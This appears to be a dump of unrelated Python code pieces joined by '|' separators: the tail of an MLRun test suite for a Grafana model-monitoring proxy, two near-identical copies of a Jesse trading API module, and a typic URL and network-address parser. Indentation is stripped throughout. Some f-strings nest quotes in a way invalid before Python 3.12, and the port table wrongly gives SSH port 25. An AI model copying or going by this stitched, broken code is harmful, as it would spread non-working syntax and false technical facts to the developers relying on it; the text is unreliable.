"current_stats": '{"petal length (cm)": {"count": 100.0, "mean": 2.861, "std": 1.4495485190537463, "min": 1.0, "max": 5.1, "hist": [[4, 20, 20, 4, 2, 0, 0, 0, 0, 1, 0, 2, 3, 2, 8, 7, 6, 10, 7, 4], [1.0, 1.205, 1.41, 1.615, 1.8199999999999998, 2.025, 2.23, 2.4349999999999996, 2.6399999999999997, 2.8449999999999998, 3.05, 3.255, 3.46, 3.665, 3.8699999999999997, 4.074999999999999, 4.279999999999999, 4.484999999999999, 4.6899999999999995, 4.895, 5.1]]}, "petal width (cm)": {"count": 100.0, "mean": 5.471000000000001, "std": 0.6416983463254116, "min": 4.3, "max": 7.0, "hist": [[4, 1, 6, 5, 5, 19, 4, 1, 13, 5, 7, 6, 4, 4, 5, 2, 1, 5, 1, 2], [4.3, 4.435, 4.57, 4.705, 4.84, 4.975, 5.109999999999999, 5.245, 5.38, 5.515, 5.65, 5.785, 5.92, 6.055, 6.1899999999999995, 6.325, 6.46, 6.595, 6.73, 6.865, 7.0]]}, "sepal length (cm)": {"count": 100.0, "mean": 0.7859999999999998, "std": 0.5651530587354012, "min": 0.1, "max": 1.8, "hist": [[5, 29, 7, 7, 1, 1, 0, 0, 0, 0, 7, 3, 5, 0, 13, 7, 10, 3, 1, 1], [0.1, 0.185, 0.27, 0.355, 0.43999999999999995, 0.5249999999999999, 0.61, 0.695, 0.7799999999999999, 0.8649999999999999, 0.9499999999999998, 1.035, 1.12, 1.205, 1.29, 1.375, 1.46, 1.545, 1.63, 1.7149999999999999, 1.8]]}, "sepal width (cm)": {"count": 100.0, "mean": 3.0989999999999998, "std": 0.4787388735948953, "min": 2.0, "max": 4.4, "hist": [[1, 2, 4, 3, 4, 8, 6, 8, 14, 7, 11, 10, 6, 3, 7, 2, 1, 1, 1, 1], [2.0, 2.12, 2.24, 2.3600000000000003, 2.48, 2.6, 2.72, 2.8400000000000003, 2.96, 3.08, 3.2, 3.3200000000000003, 3.4400000000000004, 3.5600000000000005, 3.6800000000000006, 3.8000000000000003, 3.9200000000000004, 4.040000000000001, 4.16, 4.28, 4.4]]}}', # noqa
"drift_measures": '{"petal width (cm)": {"tvd": 0.4, "hellinger": 0.38143130942893605, "kld": 1.3765624725652992}, "tvd_sum": 1.755886699507389, "tvd_mean": 0.43897167487684724, "hellinger_sum": 1.7802062191831514, "hellinger_mean": 0.44505155479578784, "kld_sum": 9.133613874253776, "kld_mean": 2.283403468563444, "sepal width (cm)": {"tvd": 0.3551724137931034, "hellinger": 0.4024622641158891, "kld": 1.7123635755188409}, "petal length (cm)": {"tvd": 0.445, "hellinger": 0.39975075965755447, "kld": 1.6449612084377268}, "sepal length (cm)": {"tvd": 0.5557142857142856, "hellinger": 0.5965618859807716, "kld": 4.399726617731908}}', # noqa
}
v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
v3io.kv.put(
container="projects",
table_path=f"{TEST_PROJECT}/model-endpoints/endpoints",
key="test.test_id",
attributes=endpoint_data,
)
response = client.post(
url="/api/grafana-proxy/model-endpoints/query",
headers={"X-V3io-Session-Key": _get_access_key()},
json={
"targets": [
{
"target": f"project={TEST_PROJECT};endpoint_id=test.test_id;target_endpoint=individual_feature_analysis" # noqa
}
]
},
)
assert response.status_code == 200
response_json = response.json()
assert len(response_json) == 1
assert "columns" in response_json[0]
assert "rows" in response_json[0]
assert len(response_json[0]["rows"]) == 4
@pytest.mark.skipif(
_is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_individual_feature_analysis_missing_field_doesnt_fail(
db: Session, client: TestClient
):
endpoint_data = {
"timestamp": "2021-02-28 21:02:58.642108",
"project": TEST_PROJECT,
"model": "test-model",
"function": "v2-model-server",
"tag": "latest",
"model_class": "ClassifierModel",
"endpoint_id": "test.test_id",
"labels": "null",
"latency_avg_1s": 42427.0,
"predictions_per_second_count_1s": 141,
"first_request": "2021-02-28 21:02:58.642108",
"last_request": "2021-02-28 21:02:58.642108",
"error_count": 0,
"feature_names": '["sepal length (cm)", "sepal width (cm)", "petal length (cm)", "petal width (cm)"]',
"feature_stats": '{"sepal length (cm)": {"count": 30, "mean": 5.946666666666668, "std": 0.8394305678023165, "min": 4.7, "max": 7.9, "hist": [[4, 4, 4, 4, 4, 3, 4, 0, 3, 4, 1, 1, 2, 1, 0, 1, 0, 0, 1, 1], [4.7, 4.86, 5.0200000000000005, 5.18, 5.34, 5.5, 5.66, 5.82, 5.98, 6.140000000000001, 6.300000000000001, 6.46, 6.62, 6.78, 6.94, 7.1, 7.26, 7.42, 7.58, 7.74, 7.9]]}, "sepal width (cm)": {"count": 30, "mean": 3.119999999999999, "std": 0.4088672324766359, "min": 2.2, "max": 3.8, "hist": [[1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 3, 3, 2, 2, 0, 3, 1, 1, 0, 4], [2.2, 2.2800000000000002, 2.3600000000000003, 2.44, 2.52, 2.6, 2.68, 2.7600000000000002, 2.84, 2.92, 3, 3.08, 3.16, 3.24, 3.3200000000000003, 3.4, 3.48, 3.56, 3.6399999999999997, 3.7199999999999998, 3.8]]}, "petal length (cm)": {"count": 30, "mean": 3.863333333333333, "std": 1.8212317418360753, "min": 1.3, "max": 6.7, "hist": [[6, 6, 6, 6, 6, 6, 0, 0, 1, 2, 0, 3, 3, 2, 2, 3, 1, 1, 1, 1], [1.3, 1.57, 1.84, 2.1100000000000003, 2.38, 2.6500000000000004, 2.92, 3.1900000000000004, 3.46, 3.7300000000000004, 4, 4.2700000000000005, 4.54, 4.8100000000000005, 5.08, 5.3500000000000005, 5.62, 5.89, 6.16, 6.430000000000001, 6.7]]}, "petal width (cm)": {"count": 30, "mean": 1.2733333333333334, "std": 0.8291804567674381, "min": 0.1, "max": 2.5, "hist": [[5, 5, 5, 5, 5, 5, 0, 0, 1, 2, 3, 2, 1, 0, 2, 3, 1, 1, 0, 4], [0.1, 0.22, 0.33999999999999997, 0.45999999999999996, 0.58, 0.7, 0.82, 0.94, 1.06, 1.1800000000000002, 1.3, 1.42, 1.54, 1.6600000000000001, 1.78, 1.9, 2.02, 2.14, 2.2600000000000002, 2.38, 2.5]]}}', # noqa
"drift_measures": '{"petal width (cm)": {"tvd": 0.4, "hellinger": 0.38143130942893605, "kld": 1.3765624725652992}, "tvd_sum": 1.755886699507389, "tvd_mean": 0.43897167487684724, "hellinger_sum": 1.7802062191831514, "hellinger_mean": 0.44505155479578784, "kld_sum": 9.133613874253776, "kld_mean": 2.283403468563444, "sepal width (cm)": {"tvd": 0.3551724137931034, "hellinger": 0.4024622641158891, "kld": 1.7123635755188409}, "petal length (cm)": {"tvd": 0.445, "hellinger": 0.39975075965755447, "kld": 1.6449612084377268}, "sepal length (cm)": {"tvd": 0.5557142857142856, "hellinger": 0.5965618859807716, "kld": 4.399726617731908}}', # noqa
}
v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
v3io.kv.put(
container="projects",
table_path=f"{TEST_PROJECT}/model-endpoints/endpoints",
key="test.test_id",
attributes=endpoint_data,
)
response = client.post(
url="/api/grafana-proxy/model-endpoints/query",
headers={"X-V3io-Session-Key": _get_access_key()},
json={
"targets": [
{
"target": f"project={TEST_PROJECT};endpoint_id=test.test_id;target_endpoint=individual_feature_analysis" # noqa
}
]
},
)
assert response.status_code == 200
response_json = response.json()
assert len(response_json) == 1
assert "columns" in response_json[0]
assert "rows" in response_json[0]
assert len(response_json[0]["rows"]) == 4
for row in response_json[0]["rows"]:
assert row[0] is not None
assert all(map(lambda e: e is None, row[1:4]))
assert all(map(lambda e: e is not None, row[4:10]))
@pytest.mark.skipif(
_is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_overall_feature_analysis(db: Session, client: TestClient):
endpoint_data = {
"timestamp": "2021-02-28 21:02:58.642108",
"project": TEST_PROJECT,
"model": "test-model",
"function": "v2-model-server",
"tag": "latest",
"model_class": "ClassifierModel",
"endpoint_id": "test.test_id",
"labels": "null",
"latency_avg_1s": 42427.0,
"predictions_per_second_count_1s": 141,
"first_request": "2021-02-28 21:02:58.642108",
"last_request": "2021-02-28 21:02:58.642108",
"error_count": 0,
"feature_names": '["sepal length (cm)", "sepal width (cm)", "petal length (cm)", "petal width (cm)"]',
"feature_stats": '{"sepal length (cm)": {"count": 30, "mean": 5.946666666666668, "std": 0.8394305678023165, "min": 4.7, "max": 7.9, "hist": [[4, 4, 4, 4, 4, 3, 4, 0, 3, 4, 1, 1, 2, 1, 0, 1, 0, 0, 1, 1], [4.7, 4.86, 5.0200000000000005, 5.18, 5.34, 5.5, 5.66, 5.82, 5.98, 6.140000000000001, 6.300000000000001, 6.46, 6.62, 6.78, 6.94, 7.1, 7.26, 7.42, 7.58, 7.74, 7.9]]}, "sepal width (cm)": {"count": 30, "mean": 3.119999999999999, "std": 0.4088672324766359, "min": 2.2, "max": 3.8, "hist": [[1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 3, 3, 2, 2, 0, 3, 1, 1, 0, 4], [2.2, 2.2800000000000002, 2.3600000000000003, 2.44, 2.52, 2.6, 2.68, 2.7600000000000002, 2.84, 2.92, 3, 3.08, 3.16, 3.24, 3.3200000000000003, 3.4, 3.48, 3.56, 3.6399999999999997, 3.7199999999999998, 3.8]]}, "petal length (cm)": {"count": 30, "mean": 3.863333333333333, "std": 1.8212317418360753, "min": 1.3, "max": 6.7, "hist": [[6, 6, 6, 6, 6, 6, 0, 0, 1, 2, 0, 3, 3, 2, 2, 3, 1, 1, 1, 1], [1.3, 1.57, 1.84, 2.1100000000000003, 2.38, 2.6500000000000004, 2.92, 3.1900000000000004, 3.46, 3.7300000000000004, 4, 4.2700000000000005, 4.54, 4.8100000000000005, 5.08, 5.3500000000000005, 5.62, 5.89, 6.16, 6.430000000000001, 6.7]]}, "petal width (cm)": {"count": 30, "mean": 1.2733333333333334, "std": 0.8291804567674381, "min": 0.1, "max": 2.5, "hist": [[5, 5, 5, 5, 5, 5, 0, 0, 1, 2, 3, 2, 1, 0, 2, 3, 1, 1, 0, 4], [0.1, 0.22, 0.33999999999999997, 0.45999999999999996, 0.58, 0.7, 0.82, 0.94, 1.06, 1.1800000000000002, 1.3, 1.42, 1.54, 1.6600000000000001, 1.78, 1.9, 2.02, 2.14, 2.2600000000000002, 2.38, 2.5]]}}', # noqa
"drift_measures": '{"petal width (cm)": {"tvd": 0.4, "hellinger": 0.38143130942893605, "kld": 1.3765624725652992}, "tvd_sum": 1.755886699507389, "tvd_mean": 0.43897167487684724, "hellinger_sum": 1.7802062191831514, "hellinger_mean": 0.44505155479578784, "kld_sum": 9.133613874253776, "kld_mean": 2.283403468563444, "sepal width (cm)": {"tvd": 0.3551724137931034, "hellinger": 0.4024622641158891, "kld": 1.7123635755188409}, "petal length (cm)": {"tvd": 0.445, "hellinger": 0.39975075965755447, "kld": 1.6449612084377268}, "sepal length (cm)": {"tvd": 0.5557142857142856, "hellinger": 0.5965618859807716, "kld": 4.399726617731908}}', # noqa
}
v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
v3io.kv.put(
container="projects",
table_path=f"{TEST_PROJECT}/model-endpoints/endpoints",
key="test.test_id",
attributes=endpoint_data,
)
response = client.post(
url="/api/grafana-proxy/model-endpoints/query",
headers={"X-V3io-Session-Key": _get_access_key()},
json={
"targets": [
{
"target": f"project={TEST_PROJECT};endpoint_id=test.test_id;target_endpoint=overall_feature_analysis" # noqa
}
]
},
)
assert response.status_code == 200
response_json = response.json()
assert len(response_json) == 1
assert "columns" in response_json[0]
assert "rows" in response_json[0]
assert len(response_json[0]["rows"][0]) == 6
def test_parse_query_parameters_failure():
# No 'targets' in body
with pytest.raises(MLRunBadRequestError):
_parse_query_parameters({})
# No 'target' list in 'targets' dictionary
with pytest.raises(MLRunBadRequestError):
_parse_query_parameters({"targets": []})
# Target query not separated by equals ('=') char
with pytest.raises(MLRunBadRequestError):
_parse_query_parameters({"targets": [{"target": "test"}]})
def test_parse_query_parameters_success():
# Target query separated by equals ('=') char
params = _parse_query_parameters({"targets": [{"target": "test=some_test"}]})
assert params["test"] == "some_test"
# Target query separated by equals ('=') char (multiple queries)
params = _parse_query_parameters(
{"targets": [{"target": "test=some_test;another_test=some_other_test"}]}
)
assert params["test"] == "some_test"
assert params["another_test"] == "some_other_test"
params = _parse_query_parameters(
{"targets": [{"target": "test=some_test;another_test=some_other_test;"}]}
)
assert params["test"] == "some_test"
assert params["another_test"] == "some_other_test"
def test_validate_query_parameters_failure():
# No 'target_endpoint' in query parameters
with pytest.raises(MLRunBadRequestError):
_validate_query_parameters({})
# target_endpoint unsupported
with pytest.raises(MLRunBadRequestError):
_validate_query_parameters(
{"target_endpoint": "unsupported_endpoint"}, {"supported_endpoint"}
)
def test_validate_query_parameters_success():
_validate_query_parameters(
{"target_endpoint": "list_endpoints"}, {"list_endpoints"}
)
def _get_access_key() -> Optional[str]:
return os.environ.get("V3IO_ACCESS_KEY")
@pytest.fixture(autouse=True)
def cleanup_endpoints(db: Session, client: TestClient):
if not _is_env_params_dont_exist():
kv_path = config.model_endpoint_monitoring.store_prefixes.default.format(
project=TEST_PROJECT, kind=ENDPOINTS
)
_, kv_container, kv_path = parse_model_endpoint_store_prefix(kv_path)
tsdb_path = config.model_endpoint_monitoring.store_prefixes.default.format(
project=TEST_PROJECT, kind=EVENTS
)
_, tsdb_container, tsdb_path = parse_model_endpoint_store_prefix(tsdb_path)
v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
frames = get_frames_client(
token=_get_access_key(),
container=tsdb_container,
address=config.v3io_framesd,
)
try:
all_records = v3io.kv.new_cursor(
container=kv_container,
table_path=kv_path,
raise_for_status=RaiseForStatus.never,
).all()
all_records = [r["__name"] for r in all_records]
# Cleanup KV
for record in all_records:
v3io.kv.delete(
container=kv_container,
table_path=kv_path,
key=record,
raise_for_status=RaiseForStatus.never,
)
except RuntimeError:
pass
try:
# Cleanup TSDB
frames.delete(
backend="tsdb", table=tsdb_path, if_missing=fpb2.IGNORE,
)
except CreateError:
pass
@pytest.mark.skipif(
_is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_incoming_features(db: Session, client: TestClient):
path = config.model_endpoint_monitoring.store_prefixes.default.format(
project=TEST_PROJECT, kind=EVENTS
)
_, container, path = parse_model_endpoint_store_prefix(path)
frames = get_frames_client(
token=_get_access_key(), container=container, address=config.v3io_framesd,
)
frames.create(backend="tsdb", table=path, rate="10/m", if_exists=1)
start = datetime.utcnow()
endpoints = [_mock_random_endpoint() for _ in range(5)]
for e in endpoints:
e.spec.feature_names = ["f0", "f1", "f2", "f3"]
for endpoint in endpoints:
ModelEndpoints.create_or_patch(_get_access_key(), endpoint)
total = 0
dfs = []
for i in range(10):
count = randint(1, 10)
total += count
data = {
"f0": i,
"f1": i + 1,
"f2": i + 2,
"f3": i + 3,
"endpoint_id": endpoint.metadata.uid,
"timestamp": start - timedelta(minutes=10 - i),
}
df = pd.DataFrame(data=[data])
dfs.append(df)
frames.write(
backend="tsdb",
table=path,
dfs=dfs,
index_cols=["timestamp", "endpoint_id"],
)
for endpoint in endpoints:
response = client.post(
url="/api/grafana-proxy/model-endpoints/query",
headers={"X-V3io-Session-Key": _get_access_key()},
json={
"targets": [
{
"target": f"project={TEST_PROJECT};endpoint_id={endpoint.metadata.uid};target_endpoint=incoming_features" # noqa
}
]
},
)
response = response.json()
targets = [t["target"] for t in response]
assert targets == ["f0", "f1", "f2", "f3"]
lens = [t["datapoints"] for t in response]
assert all(map(lambda l: len(l) == 10, lens))
|
import threading
from typing import Union
import jesse.helpers as jh
from jesse.models import Order
from jesse.services import logger
class API:
def __init__(self) -> None:
self.drivers = {}
if not jh.is_live():
self.initiate_drivers()
def initiate_drivers(self) -> None:
for e in jh.get_config('app.considering_exchanges'):
if jh.is_live():
def initiate_ws(exchange_name: str) -> None:
from jesse_live.info import SUPPORTED_EXCHANGES, SUPPORTED_EXCHANGES_NAMES
exchange_class = jh.get_config(f'app.live_drivers.{exchange_name}')
if exchange_name not in SUPPORTED_EXCHANGES_NAMES:
exchange_names = ''
for se in SUPPORTED_EXCHANGES:
exchange_names += f'\n "{se['name']}"'
error_msg = f'Driver for "{exchange_name}" is not supported yet. Supported exchanges are: {exchange_names}'
jh.error(error_msg, force_print=True)
jh.terminate_app()
self.drivers[exchange_name] = exchange_class()
threading.Thread(target=initiate_ws, args=[e]).start()
else:
from jesse.exchanges import Sandbox
self.drivers[e] = Sandbox(e)
def market_order(
self,
exchange: str,
symbol: str,
qty: float,
current_price: float,
side: str,
role: str,
flags: list
) -> Union[Order, None]:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return None
return self.drivers[exchange].market_order(symbol, qty, current_price, side, role, flags)
def limit_order(
self,
exchange: str,
symbol: str,
qty: float,
price: float,
side: str,
role: str,
flags: list
) -> Union[Order, None]:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return None
return self.drivers[exchange].limit_order(symbol, qty, price, side, role, flags)
def stop_order(
self, exchange: str,
symbol: str,
qty: float,
price: float,
side: str,
role: str,
flags: list
) -> Union[Order, None]:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return None
return self.drivers[exchange].stop_order(symbol, qty, price, side, role, flags)
def cancel_all_orders(self, exchange: str, symbol: str) -> bool:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return False
return self.drivers[exchange].cancel_all_orders(symbol)
def cancel_order(self, exchange: str, symbol: str, order_id: str) -> bool:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return False
return self.drivers[exchange].cancel_order(symbol, order_id)
api = API()
| import threading
from typing import Union
import jesse.helpers as jh
from jesse.models import Order
from jesse.services import logger
class API:
def __init__(self) -> None:
self.drivers = {}
if not jh.is_live():
self.initiate_drivers()
def initiate_drivers(self) -> None:
for e in jh.get_config('app.considering_exchanges'):
if jh.is_live():
def initiate_ws(exchange_name: str) -> None:
from jesse_live.info import SUPPORTED_EXCHANGES, SUPPORTED_EXCHANGES_NAMES
exchange_class = jh.get_config(f'app.live_drivers.{exchange_name}')
if exchange_name not in SUPPORTED_EXCHANGES_NAMES:
exchange_names = ''
for se in SUPPORTED_EXCHANGES:
exchange_names += f'\n "{se["name"]}"'
error_msg = f'Driver for "{exchange_name}" is not supported yet. Supported exchanges are: {exchange_names}'
jh.error(error_msg, force_print=True)
jh.terminate_app()
self.drivers[exchange_name] = exchange_class()
threading.Thread(target=initiate_ws, args=[e]).start()
else:
from jesse.exchanges import Sandbox
self.drivers[e] = Sandbox(e)
def market_order(
self,
exchange: str,
symbol: str,
qty: float,
current_price: float,
side: str,
role: str,
flags: list
) -> Union[Order, None]:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return None
return self.drivers[exchange].market_order(symbol, qty, current_price, side, role, flags)
def limit_order(
self,
exchange: str,
symbol: str,
qty: float,
price: float,
side: str,
role: str,
flags: list
) -> Union[Order, None]:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return None
return self.drivers[exchange].limit_order(symbol, qty, price, side, role, flags)
def stop_order(
self, exchange: str,
symbol: str,
qty: float,
price: float,
side: str,
role: str,
flags: list
) -> Union[Order, None]:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return None
return self.drivers[exchange].stop_order(symbol, qty, price, side, role, flags)
def cancel_all_orders(self, exchange: str, symbol: str) -> bool:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return False
return self.drivers[exchange].cancel_all_orders(symbol)
def cancel_order(self, exchange: str, symbol: str, order_id: str) -> bool:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return False
return self.drivers[exchange].cancel_order(symbol, order_id)
api = API()
|
from __future__ import annotations
import dataclasses
import re
from collections import defaultdict
from types import MappingProxyType
from typing import Dict, List, ClassVar, Pattern, Match, Mapping, Set, Optional
from urllib import parse
from typic.util import cached_property, slotted
from .secret import SecretStr
__all__ = (
"NetAddrInfo",
"NetworkAddress",
"NetworkAddressValueError",
"AbsoluteURL",
"AbsoluteURLValueError",
"HostName",
"HostNameValueError",
"RelativeURL",
"RelativeURLValueError",
"URL",
)
# By no means an exhaustive list, but a decent chunk of use-cases
DEFAULT_PORTS = defaultdict(
set,
{
"http": {80},
"https": {443},
"ws": {80},
"wss": {443},
"smtp": {25},
"ftp": {20, 21},
"telnet": {23},
"imap": {143},
"rdp": {3389},
"ssh": {25},
"dns": {53},
"dhcp": {67, 68},
"pop3": {110},
"mysql": {3306},
"vertica": {5434},
"postgresql": {5432},
},
)
NET_ADDR_PATTERN = re.compile(
r"""
^
(
# Scheme
((?P<scheme>(?:[a-z0-9\.\-\+]*))://)?
# Auth
(?P<auth>(?:(?P<username>[^:@]+?)[:@](?P<password>[^:@]*?)[:@]))?
# Host
(?P<host>(?:
# Domain
(?P<domain>
(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+
(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)
)
# Localhost
|(?P<localhost>localhost)
|(?P<dotless>(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.?))
# IPV4
|(?P<ipv4>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})
# IPV6
|(?P<ipv6>\[[A-F0-9]*:[A-F0-9:]+\])
))?
# Port
(:(?P<port>(?:\d+)))?
)?
# Path, Q-string & fragment
(?P<relative>(?:/?|[/?#]\S+))
$
""",
re.IGNORECASE | re.VERBOSE,
)
PRIVATE_HOSTS = {"localhost", "127.0.0.1"}
INTERNAL_HOSTS = PRIVATE_HOSTS | {"0.0.0.0"}
INTERNAL_IP_PATTERN = re.compile(
r"""
^
# IPv4
(127\.)|
(192\.168\.)|
(10\.)|(172\.1[6-9]\.)|
(172\.2[0-9]\.)|(172\.3[0-1]\.)|
# IPv6
(::1)|([F][CD])
$
""",
re.I | re.VERBOSE,
)
class NetworkAddressValueError(ValueError):
"""A generic error indicating the value is not a valid network address."""
@slotted(dict=True)
@dataclasses.dataclass(frozen=True)
class NetAddrInfo:
"""Detailed information about a network address.
Can be called directly, generated by casting a :py:class:`str` as
:py:class:`NetworkAddress`, or created with :py:meth:`NetAddrInfo.from_str`
"""
scheme: str
"""The net-address scheme, e.g., `http`, `tcp`, `ssh`, etc."""
auth: str
"""The user auth info."""
password: SecretStr
"""The user's password."""
host: str
"""The host for this addres, e.g. `0.0.0.0`, `foobar.net`."""
port: int
"""The port for this net-address"""
path: str
"""The URI path."""
qs: str
"""The query-string, unparsed, e.g. `?id=1&name=foo`"""
params: str
"""The url parameters, unparsed, e.g. `id=2;foo=bar`"""
fragment: str
"""The uri fragment, e.g. `#some-page-anchor`"""
is_ip: bool = False
PATTERN: ClassVar[Pattern] = NET_ADDR_PATTERN
DEFAULT_PORTS: ClassVar[Dict] = DEFAULT_PORTS
PRIVATE_HOSTS: ClassVar[Set[str]] = PRIVATE_HOSTS
INTERNAL_HOSTS: ClassVar[Set[str]] = INTERNAL_HOSTS
@classmethod
def from_str(cls, value) -> "NetAddrInfo":
"""Parse a string, validate, and return an instance of :py:class:`NetAddrInfo`."""
match: Optional[Match] = cls.PATTERN.match(value)
if not match or not value:
raise NetworkAddressValueError(f"{value!r} is not a valid network address.")
scheme, host = match["scheme"] or "", match["host"] or ""
if scheme and not host:
raise NetworkAddressValueError(f"{value!r} is not a valid network address.")
# why re-invent the wheel here? this is fast and correct.
parsed: parse.ParseResult = parse.urlparse(match["relative"] or "")
# get/set the port
port = int(match["port"] or 0)
if port == 0 and cls.DEFAULT_PORTS[scheme]:
port = cls.DEFAULT_PORTS[scheme].copy().pop()
return cls(
scheme=scheme,
auth=match["auth"] or "",
password=SecretStr(match["password"] or ""),
host=host,
port=port,
path=parsed.path,
qs=parsed.query,
params=parsed.params,
fragment=parsed.fragment,
is_ip=bool(match["ipv4"] or match["ipv6"]),
)
@cached_property
def base(self) -> str:
"""The 'base' of the URL, including scheme, auth, and host."""
base = f"{self.scheme}://" if self.scheme else ""
port = f":{self.port}" if self.port and not self.is_default_port else ""
return f"{base}{self.auth}{self.host}{port}"
@cached_property
def relative(self):
"""The 'relative' portion of the URL: path, params, query, and fragment."""
params = f";{self.params}" if self.params else ""
qs = f"?{self.qs}" if self.qs else ""
fragment = f"#{self.fragment}" if self.fragment else ""
return f"{self.path}{params}{qs}{fragment}"
@cached_property
def address(self) -> str:
"""The fully-qualified network address.
If this instance was generated from a string, it will match."""
return f"{self.base}{self.relative}"
@cached_property
def address_encoded(self) -> str:
"""The fully-qualified network address, encoded."""
return parse.quote(self.address) # type: ignore
@cached_property
def query(self) -> Mapping[str, List[str]]:
"""The query-string, parsed into a mapping of key -> [values, ...]."""
return MappingProxyType(parse.parse_qs(self.qs) if self.qs else {})
@cached_property
def parameters(self) -> Mapping[str, List[str]]:
"""The params, parsed into a mapping of key -> [values, ...]."""
return MappingProxyType(parse.parse_qs(self.params) if self.params else {})
@cached_property
def is_default_port(self) -> bool:
"""Whether address is using the default port assigned to the given scheme."""
defaults = DEFAULT_PORTS[self.scheme] | {0}
return self.port in defaults
@cached_property
def is_relative(self) -> bool:
"""Whether address is 'relative' (i.e., whether a scheme is provided)."""
return not self.scheme
@cached_property
def is_absolute(self) -> bool:
"""The opposite of `is_relative`."""
return not self.is_relative
@cached_property
def is_private(self) -> bool:
"""Whether or not the URL is using a 'private' host, i.e., 'localhost'."""
return self.host in PRIVATE_HOSTS
@cached_property
def is_internal(self) -> bool:
"""Whether the host provided is an 'internal' host.
This may or may not be private, hence the distinction."""
return bool(
self.host
and self.host in INTERNAL_HOSTS
or (self.is_ip and INTERNAL_IP_PATTERN.match(self.host))
)
# Deepcopy is broken for frozen dataclasses with slots.
# https://github.com/python/cpython/pull/17254
# NetAddrInfo.__slots__ = tuple(
# _.name for _ in dataclasses.fields(NetAddrInfo)
# )
class NetworkAddress(str):
"""A generic, immutable network address string.
Detailed information about the network address string can be looked up via
:py:attr:`NetworkAddress.info`.
This object is the base object for network-related objects.
:py:class:`URL` has a much richer interface.
Examples
--------
>>> import typic
>>> net_addr = typic.NetworkAddress("http://foo.bar/bazz;foo=bar?buzz=1#loc")
>>> net_addr.info.is_absolute
True
>>> net_addr.info.host
'foo.bar'
>>> net_addr.info.scheme
'http'
>>> net_addr.info.address_encoded
'http%3A//foo.bar/bazz%3Bfoo%3Dbar%3Fbuzz%3D1%23loc'
>>> net_addr.info.query
mappingproxy({'buzz': ['1']})
>>> net_addr.info.parameters
mappingproxy({'foo': ['bar']})
>>> net_addr.info.fragment
'loc'
>>> domain = typic.URL("foo.bar")
>>> domain.info.is_relative
True
>>> domain.info.host
'foo.bar'
>>> net_addr
'http://foo.bar/bazz;foo=bar?buzz=1#loc'
>>> import json
>>> json.dumps([net_addr])
'["http://foo.bar/bazz;foo=bar?buzz=1#loc"]'
See Also
--------
:py:class:`NetAddrInfo`
:py:class:`URL`
Notes
-----
This object inherits directly from :py:class:`str` and so is natively
JSON-serializable.
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
# Initialize the info so we get validation immediately.
v.info
return v
def __setattr__(self, key, value):
raise AttributeError(
f"attempting to set attribute on immutable type {type(self)}"
)
def __delattr__(self, key):
raise AttributeError(
f"attempting to delete attribute on immutable type {type(self)}"
)
@cached_property
def info(self) -> NetAddrInfo:
return NetAddrInfo.from_str(self)
class URLValueError(NetworkAddressValueError):
"""Generic error for an invalid value passed to URL."""
pass
class URL(NetworkAddress):
"""A string which parses the value provided as if it were a URL.
Detailed information about the url string can be looked up via :py:attr:`URL.info`.
Examples
--------
>>> import typic
>>> url = typic.URL("http://foo.bar/bazz")
>>> more = url / 'foo' / 'bar'
>>> more
'http://foo.bar/bazz/foo/bar'
>>> typic.URL(url.info.base) / 'other'
'http://foo.bar/other'
See Also
--------
:py:class:`NetworkAddress`
:py:class:`NetAddrInfo`
Notes
-----
This object inherits directly from :py:class:`NetworkAddress` and so is natively
JSON-serializable.
"""
def join(self, other) -> "URL":
"""Join another URL with this one.
This works roughly like :py:meth:`pathlib.Path.joinpath`.
Unlike :py:func:`urllib.parse.urljoin`, this method allows the user to build
onto existing paths.
"""
cls = type(self)
# best guess at the path
other_info: NetAddrInfo = cls(other).info # type: ignore
self_info: NetAddrInfo = self.info # type: ignore
other = (other_info.path or parse.urlparse(other).path or "").lstrip("/")
other = f"{self_info.path.rstrip("/") or ""}/{other}"
return cls(parse.urljoin(self_info.base, other)) # type: ignore
def __truediv__(self, other) -> "URL":
"""Overloading some operators to make it easier. Uses `:py:meth:`URL.join`."""
return self.join(other)
def __rtruediv__(self, other) -> "URL":
return URL(other) / self
class AbsoluteURLValueError(URLValueError):
pass
class AbsoluteURL(URL):
"""An absolute URL.
See Also
--------
:py:class:`URL`
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
if v.info.is_relative:
raise AbsoluteURLValueError(f"<{v!r}> is not an absolute URL.") from None
return v
class RelativeURLValueError(URLValueError):
pass
class RelativeURL(URL):
"""A relative URL.
See Also
--------
:py:class:`URL`
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
if v.info.is_absolute:
raise RelativeURLValueError(f"<{v!r}> is not a relative URL.") from None
return v
class HostNameValueError(NetworkAddressValueError):
pass
